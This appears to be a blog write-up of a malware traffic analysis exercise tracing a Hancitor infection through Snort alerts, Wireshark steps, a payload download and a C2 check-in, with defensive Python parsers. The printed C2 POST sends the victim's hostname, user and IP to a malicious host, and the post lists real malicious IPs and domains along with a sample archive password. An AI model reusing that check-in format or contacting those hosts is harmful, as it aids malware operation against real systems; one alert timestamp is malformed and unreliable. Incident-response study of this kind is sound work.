24th October 2020

Malware Traffic Analysis Exercise – SOL Lightnet

Malware Traffic Analysis

The website https://www.malware-traffic-analysis.net focuses on network traffic related to malware infections. With every exercise, a capture file is offered for download, which then needs to be analyzed with Wireshark.

Exercise

Write an incident report based on the pcap-file and associated alerts.

Source files

The source files can be downloaded below. The download comes directly from the source location where this exercise is stored: https://www.malware-traffic-analysis.net/2020/01/30/index.html.

Password: infected

Zip archive of the pcap-file:

  • 2020-01-30-traffic-analysis-exercise.pcap (8,609,402 bytes)

Zip archive of the alerts:

  • 2020-01-30-traffic-analysis-exercise-alerts.jpg   (686,661 bytes)
  • 2020-01-30-traffic-analysis-exercise-alerts.txt   (4,568 bytes)

Scenario

  • LAN segment range:  10.20.30.0/24 (10.20.30.0 through 10.20.30.255)
  • Domain:  sol-lightnet.com
  • Domain controller:  10.20.30.2 – Sol-Lightnet-DC
  • LAN segment gateway:  10.20.30.1
  • LAN segment broadcast address:  10.20.30.255

The monitoring system SNORT is issuing a warning. All eyes of the SOC analysts go to the monitoring screen. What's going on? SNORT is showing the following:

The file 2020-01-30-traffic-analysis-exercise-alerts.txt contains the same alerts as flat text:

~# cat 2020-01-30-traffic-analysis-exercise-alerts.txt
------------------------------------------------------------------------
Count:8 Event#3.1256 2020-01-30 00:54:55 UTC
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
10.20.30.227 -> 23.51.186.146
IPVer=4 hlen=5 tos=0 dlen=386 ID=0 flags=0 offset=0 ttl=0 chksum=48826
Protocol: 6 sport=49696 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=33634 chksum=0
------------------------------------------------------------------------
Count:1 Event#3.1257 2020-01-30 00:54:55 UTC
ET INFO Windows OS Submitting USB Metadata to Microsoft
10.20.30.227 -> 40.67.249.61
IPVer=4 hlen=5 tos=0 dlen=379 ID=0 flags=0 offset=0 ttl=0 chksum=28422
Protocol: 6 sport=49697 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=53490 chksum=0
------------------------------------------------------------------------
Count:16 Event#3.1267 2020-01-30 00:55:56 UTC
ET DNS Standard query response, Name Error
10.20.30.2 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=146 ID=60138 flags=0 offset=0 ttl=128 chksum=65123
Protocol: 17 sport=53 -> dport=64462
len=126 chksum=15751
------------------------------------------------------------------------
Count:1 Event#3.1269 2020-01-30 00:55:57 UTC
ET POLICY exe download via HTTP - Informational
10.20.30.227 -> 49.51.133.162
IPVer=4 hlen=5 tos=0 dlen=264 ID=0 flags=0 offset=0 ttl=0 chksum=55844
Protocol: 6 sport=49728 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=1844 chksum=0
------------------------------------------------------------------------
Count:1 Event#3.1270 2020-01-30 00:55:57 UTC
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
10.20.30.227 -> 49.51.133.162
IPVer=4 hlen=5 tos=0 dlen=264 ID=0 flags=0 offset=0 ttl=0 chksum=55844
Protocol: 6 sport=49728 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=1844 chksum=0
------------------------------------------------------------------------
Count:4 Event#3.1271 2020-01-30 00:55:58 UTC
ET POLICY Binary Download Smaller than 1 MB Likely Hostile
49.51.133.162 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=54608
Protocol: 6 sport=80 -> dport=49728
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=32895 chksum=0
------------------------------------------------------------------------
Count:30 Event#3.1275 2020-01-30 00:55:58 UTC
ET POLICY PE EXE or DLL Windows file download HTTP
49.51.133.162 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=54608
Protocol: 6 sport=80 -> dport=49728
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=32895 chksum=0
------------------------------------------------------------------------
Count:1 Event#3.1305 2020-01-30 00:55:58 UTC
ET POLICY External IP Lookup api.ipify.org
10.20.30.227 -> 184.73.165.106
IPVer=4 hlen=5 tos=0 dlen=204 ID=0 flags=0 offset=0 ttl=0 chksum=13186
Protocol: 6 sport=49729 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=4413 chksum=0
------------------------------------------------------------------------
Count:5 Event#3.1306 2020-01-30 00:55:58 UTC
ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin
10.20.30.227 -> 81.177.6.156
IPVer=4 hlen=5 tos=0 dlen=422 ID=0 flags=0 offset=0 ttl=0 chksum=14351
Protocol: 6 sport=49730 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=63486 chksum=0
------------------------------------------------------------------------
Count:60 Event#3.1307 2020-01-30 00:56:00 UTC
ETPRO TROJAN Hancitor encrypted payload Jan 17 (1)
148.66.137.40 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=28347
Protocol: 6 sport=80 -> dport=49731
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=53509 chksum=0
------------------------------------------------------------------------
Count:2 Event#3.1337 2020-01-30 00:56:00 UTC
ET TROJAN Fareit/Pony Downloader Checkin 2
10.20.30.227 -> 81.177.6.156
IPVer=4 hlen=5 tos=0 dlen=375 ID=0 flags=0 offset=0 ttl=0 chksum=14398
Protocol: 6 sport=49732 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=53673 chksum=0
------------------------------------------------------------------------
Count:24 Event#3.1372 2020-01-30 43391 UTC
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
49.51.133.162 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=54608
Protocol: 6 sport=80 -> dport=49728
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=43506 chksum=0

At one of our customers, our threat detection monitor SNORT apparently detected malware on the network. My team leader assigned this call to me. I start the investigation by downloading the .pcap file and opening it in Wireshark.
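Before opening the pcap, the alert file itself can be triaged. The parser below is an added example (my own code, not part of the write-up or of the exercise files): it splits the flat-file records shown above into dicts and lists which hosts outside the 10.20.30.0/24 LAN from the scenario the sensor flagged. The embedded sample is three records copied from the alert list, with the IPVer/Seq detail lines left out.

```python
import ipaddress
import re

LAN = ipaddress.ip_network("10.20.30.0/24")  # LAN segment from the scenario

# Constructed sample in the flat-file layout of the exercise alert file
# (three records from the list; IPVer/Seq detail lines omitted for brevity).
SAMPLE_ALERTS = """\
------------------------------------------------------------------------
Count:1 Event#3.1269 2020-01-30 00:55:57 UTC
ET POLICY exe download via HTTP - Informational
10.20.30.227 -> 49.51.133.162
Protocol: 6 sport=49728 -> dport=80
------------------------------------------------------------------------
Count:30 Event#3.1275 2020-01-30 00:55:58 UTC
ET POLICY PE EXE or DLL Windows file download HTTP
49.51.133.162 -> 10.20.30.227
Protocol: 6 sport=80 -> dport=49728
------------------------------------------------------------------------
Count:5 Event#3.1306 2020-01-30 00:55:58 UTC
ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin
10.20.30.227 -> 81.177.6.156
Protocol: 6 sport=49730 -> dport=80
"""

HEADER = re.compile(r"Count:(\d+) Event#(\S+) (.+?) UTC$")
FLOW = re.compile(r"^(\S+) -> (\S+)$")
PORTS = re.compile(r"Protocol: (\d+) sport=(\d+) -> dport=(\d+)")

def parse_alerts(text):
    """Split the flat file on its dashed separators and return one dict per alert."""
    alerts = []
    for block in re.split(r"^-{10,}$", text, flags=re.M):
        lines = [ln.strip() for ln in block.strip().splitlines()]
        if len(lines) < 4:
            continue  # empty leading chunk or a record too short to carry the fields
        head, flow = HEADER.match(lines[0]), FLOW.match(lines[2])
        ports = PORTS.search(block)
        if not (head and flow and ports):
            continue
        alerts.append({"count": int(head[1]), "event": head[2], "time": head[3],
                       "sig": lines[1], "src": flow[1], "dst": flow[2],
                       "proto": int(ports[1]), "sport": int(ports[2]), "dport": int(ports[3])})
    return alerts

def external_hosts(alerts):
    """Map each non-LAN IP to the set of signatures it appears in; LAN hosts are skipped."""
    hosts = {}
    for a in alerts:
        for ip in (a["src"], a["dst"]):
            if ipaddress.ip_address(ip) not in LAN:
                hosts.setdefault(ip, set()).add(a["sig"])
    return hosts
```

Running parse_alerts over the full alert file gives the two external hosts listed in the Indicators section, each with the signatures that name it.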

Analysis

I have the IP address of the client in question: 10.20.30.227. Let's start by identifying the client and the user involved; from that point I can do further research.

I filter the traffic on kerberos.CNameString && ip.src == 10.20.30.227, which gives me the computer name of the involved host: DESKTOP-4C02EMG. Based on the naming convention, I assume this is a Windows 10 computer.

I apply this field as a column.

I have now created a new column with the title CNameString. In the last frames, the username alejandrina.hogue is now visible.

The alert shows that a malicious file has probably been downloaded. I now apply a new filter to the traffic: http.request.

Frame No. 1169 looks interesting. This HTTP request shows that the file sv.exe is downloaded. The destination IP address matches the IP address from the alert.

Let's follow this TCP stream.

The client is indeed a Windows 10 machine, as the User-Agent reports Windows NT 10.0, which is Windows 10.


After downloading this file, the computer reports to the C2 (Command and Control server).

Let's also follow this HTTP stream. The request includes a unique fingerprint of this endpoint, which enables the attacker to identify the infected endpoints.

Let's export the sv.exe file and upload it to https://www.virustotal.com/gui/home/upload. VirusTotal identifies the hash as the Hancitor malware, and the threat monitor also flagged this file as Hancitor.

Executive Summary

On Thursday 30 January 2020 at 00:55:57 UTC, a Windows 10 workstation (10.20.30.227) with the computer name DESKTOP-4C02EMG, used by Alejandrina Hogue, downloaded a file named sv.exe from the server with IP address 49.51.133.162. This file infected the computer with the Hancitor malware.

Indicators

The download of the payload:

GET /sv.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)
Host: gengrasjeepram.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Jan 2020 00:55:57 GMT
Content-Type: application/octet-stream
Content-Length: 81920
Connection: keep-alive
Last-Modified: Wed, 29 Jan 2020 14:30:00 GMT
ETag: "5e3196e8-14000"
Accept-Ranges: bytes

The request to the C2:

POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: twereptale.com
Content-Length: 135
Cache-Control: no-cache

GUID=11299953219367802880&BUILD=2901_67231&INFO=DESKTOP-4C02EMG @ SOL-LIGHTNET\alejandrina.hogue&IP=173.166.146.119&TYPE=1&WIN=6.2(x64)

HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Thu, 30 Jan 2020 00:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

HZASARZAEg4OCkBVVQIVFhMdEg4cExQbFBkfVBkVF1UYEhUWG1UTFxsdHwlVSwYSDg4KQFVVCQ8UCBMJHxMXFxMdCBsOExUUGR8UDh8IVBkVF1VLBhIODgpAVVUWFQgYFQJUGRVUExRVSwYSDg4KQFVVEA8JDgoSAwkTFRkbCB9UGRUXVRMXHVUKExQJVUsGEg4OCkBVVR8WFQgYFQJUGRUXVUsHARhAEg4OCkBVVQIVFhMdEg4cExQbFBkfVBkVF1UYEhUWG1UTFxsdHwlVSAYSDg4KQFVVCQ8UCBMJHxMXFxMdCBsOExUUGR8UDh8IVBkVF1VIBhIODgpAVVUWFQgYFQJUGRVUExRVSAYSDg4KQFVVEA8JDgoSAwkTFRkbCB9UGRUXVRMXHVUKExQJVUgGEg4OCkBVVR8WFQgYFQJUGRUXVUgH
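The fingerprint in that check-in can be pulled out of the stream programmatically. The code below is an added example, not code from the write-up; it assumes the raw POST is reconstructed from the stream as shown above and that a check-in carries the six fields GUID, BUILD, INFO, IP, TYPE and WIN seen in this capture. It refuses to trust a body whose length does not match the Content-Length header.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the C2 POST from the write-up as one raw HTTP message
# (CRLF line endings; the body is the 135 bytes the Content-Length announces).
SAMPLE_POST = (
    "POST /4/forum.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: twereptale.com\r\n"
    "Content-Length: 135\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "GUID=11299953219367802880&BUILD=2901_67231&INFO=DESKTOP-4C02EMG @ SOL-LIGHTNET\\alejandrina.hogue"
    "&IP=173.166.146.119&TYPE=1&WIN=6.2(x64)"
)
CHECKIN_KEYS = {"GUID", "BUILD", "INFO", "IP", "TYPE", "WIN"}  # fields seen in the capture

def split_http(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body

def parse_checkin(raw):
    """Return the endpoint identity a Hancitor-style check-in discloses, or None
    when the POST is not a complete form body carrying the six fields."""
    request_line, headers, body = split_http(raw)
    if not request_line.startswith("POST ") or \
       headers.get("content-type") != "application/x-www-form-urlencoded":
        return None
    if int(headers.get("content-length", -1)) != len(body):
        return None  # truncated or mis-framed body: do not trust its fields
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if not CHECKIN_KEYS.issubset(fields):
        return None
    # INFO is "<hostname> @ <DOMAIN>\<user>"; IP is the public address from the
    # api.ipify.org lookup that precedes the check-in, not the 10.20.30.227 LAN IP.
    m = re.fullmatch(r"(\S+) @ ([^\\]+)\\(.+)", fields["INFO"])
    hostname, domain, user = m.groups() if m else (fields["INFO"], None, None)
    return {"c2_host": headers.get("host"), "path": request_line.split()[1],
            "guid": fields["GUID"], "build": fields["BUILD"], "hostname": hostname,
            "domain": domain, "user": user, "public_ip": fields["IP"],
            "windows": fields["WIN"]}
```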

Involved external hosts:

  1. 49.51.133.162, host with the payload.
  2. 81.177.6.156, this host is identified as the C2.

The aftermath

The cyber security engineers from the SOC immediately isolated this endpoint from the network and handed it over to the system engineers to reinstall the operating system, including formatting the disk. Other endpoints in the network have been scanned, but no other threats were found.

Thanks for reading this post! The scenario was made up by my brain and I enjoyed investigating, analyzing and reporting a fictitious attack. I learned a lot from it. The files come from https://www.malware-traffic-analysis.net/2020/01/30/index.html. Thumbs up for Brad!

This is my first post about Malware Traffic Analysis. Please get in touch if you have any questions, recommendations or if you spot a mistake.

Happy day!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
